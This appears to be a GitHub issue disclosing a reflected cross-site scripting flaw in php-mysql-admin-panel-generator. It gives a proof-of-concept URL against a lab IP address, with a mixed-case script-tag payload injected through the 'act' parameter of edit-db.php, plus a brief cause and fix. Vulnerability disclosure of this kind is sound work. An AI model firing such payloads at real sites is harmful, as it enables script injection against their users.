Open
Description
Affected software : php-mysql-admin-panel-generator
Version : N/A
Type of vulnerability : XSS (Cross-Site Scripting)
Author : s7safe
Description:
php-mysql-admin-panel-generator is susceptible to cross-site scripting attacks, allowing malicious users to inject code into web pages, and other users will be affected when viewing web pages .
PoC :
turn to http://192.168.146.130/generated/mysql2022-03-26_02-49/edit-db.php?act=%22%3E%3CScRiPt%3Ealert(%22xss%22)%3C%2FsCrIpT%3E
payload:"><ScRiPt>alert("xss")<%2FsCrIpT>
Successful
Reason:
Failure to filter or escape special characters leads to vulnerabilities
How to fix :
escape special characters or filter it .
by s7safe
Metadata
Assignees
Labels
No labels

